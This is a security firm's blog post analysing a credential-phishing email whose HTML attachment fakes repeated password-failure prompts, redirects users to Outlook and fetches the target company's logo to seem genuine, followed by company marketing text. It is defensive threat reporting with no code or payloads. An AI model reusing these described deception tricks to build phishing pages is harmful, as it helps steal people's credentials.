MegaplanIT
Security & Compliance
Active Threat Investigations - June 2021
Active Threat – Credential Stealing Email Located
We recently had a phishing investigation into an email with an HTML attachment that caught our eye. The reason being is that Microsoft just recently posted about an ongoing attack from NOBELIUM which had a similar delivery technique to this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO which drops an LNK file that will execute the Cobalt Strike Beacon loader. There’s a bit more to it than that but the HTML smuggling is where the path’s diverged with this attack luckily.
After we obtained the email from the client, we were able to dig into what was going on inside of the HTML attachment. The HTML was ‘obfuscated’, well when I say obfuscated, I really mean they “escaped” the characters in the document, something that is common with web requests. Very trivially, we were able to get the plaintext of the document and started to dig deeper into the functionality.
There were quite a few interesting things to note in this phishing campaign. The adversary did a great job at trying not to alert a user that they were in fact stealing their credentials. If a user reloaded the page more than 3 times the document would say “Scanned File Locked! Redirecting you back to your account” and would then take them back to Outlook. Also, it would prompt the user twice to enter their password telling them it was wrong each time (this is smart because many people mistype their password the first time) then the third time it would say “Scanned File Locked” and redirect them back to their Outlook page. The JavaScript on the page also dynamically pulled the image of the company off a website called Statvoo.com based on the domain name of the targeted user to make the attack even more convincing. The website that the credentials are sent to was created 5-19-2021 and is hosting a default WordPress page with no content on it. We’ve since reported the site to the hosting provider and are waiting for it to be taken down.
We did not find any evidence of malware or a dropper functionality inside of the HTML file therefore our best recommendation was to change the affected user’s passwords.
Looking for a knowledgeable partner for your cybersecurity and compliance efforts? We're Here To Help!
We look forward to talking to you about your upcoming Security Test, Compliance Assessment, and Managed Security Services priorities. Our expert security consultants and QSAs are fully certified and have decades of experience helping businesses like yours stay safe from cyber threats. Set up a time to chat with us about your biggest payment security and compliance challenges so we can partner with you to solve them!
Share this post
Subscribe To Our Newsletter
Most Popular
Post By Topic
Industry Leading Certified Experts
Subscribe
Subscribe To Our Newsletter & Stay Up-To-Date
Explore Our Blogs
Whitepaper | 10 min Read
Developing An Effective Compliance Program
This whitepaper provides organizations with a path forward. We will walk through aspects of an effective compliance program and how it can be valuable to your business. We will also outline critical steps towards developing and implementing a useful and effective Compliance Program.
New Service Offering | Contact Us
Ransomware Preparedness Assessment
As new vulnerabilities emerge in response to ongoing geopolitical threats, are you confident that your organization could defend against a ransomware attack? If not or if you are unsure, MegaplanIT is offering a Ransomware Readiness Assessment free of charge for up to 50 Systems.
ResourceGuide | 8 min Read
Cybersecurity Roadmap For 2022
Companies need to be aware of their current state, where they need improvement, and how to be proactive moving forward. Dialing in on the key elements your organization will need to succeed is a great starting point to having a full-fledged plan in place, and it all comes down to the fundamentals.
We're Here To Help
We look forward to talking to you about your upcoming Security Testing, Compliance Assessments, and Managed Security Services priorities. We are ready to help and discuss more information with you on our comprehensive list of services.
Make Our Team, Your Team!
Our innovative IT security and compliance solutions are designed to deliver customized, cost-effective service on time—because your priorities are our priorities. With a highly qualified team of PCI-DSS QSAs, Penetration Testers, and Information Security Consultants here at MegaplanIT, we will assess your unique company and business environment and design a path to security that will fit all of your needs.
Ransomware Assessment Preparedness
Cybersecurity Roadmap For 2022
Developing And Maintaining An Effective Compliance Program
As new vulnerabilities emerge in response to ongoing geopolitical threats, are you confident that your organization could defend against a ransomware attack?
A Cybersecurity Roadmap details priorities and objectives to drive progress towards security goals. The roadmap follows a data-driven path based on answers to critical questions
This whitepaper provides organizations with a path forward. We will walk through aspects of an effective compliance program and how it can be valuable to your business